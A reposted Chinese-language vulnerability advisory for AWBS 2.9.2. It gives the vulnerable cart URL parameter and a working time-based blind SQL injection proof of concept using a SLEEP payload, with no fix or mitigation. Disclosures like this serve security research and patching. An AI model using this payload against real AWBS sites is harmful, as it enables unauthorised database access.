首页 > 系统服务 > 详细

AWBS 2.9.2 Blind SQL 注入0day

时间:2015-12-30 12:54:06      阅读:286      评论:0      收藏:0      [点我收藏+]

  影响版本:AWBS 2.9.2

  官方网站:http://www.awbs.com

  漏洞类型:SQL注入

  漏洞描述:

  ---Vulnerability---

  http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]‘[BLIND-SQL]

  =============================================================================================

  ---PoC Using Time-Based Blind SQL Injection---

  https://www.vulnerablehost.com/cart?ca=add_other&oid=1‘%20AND%20SLEEP(100)=‘

 

AWBS 2.9.2 Blind SQL 注入0day

原文:http://www.jb51.net/hack/34728.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!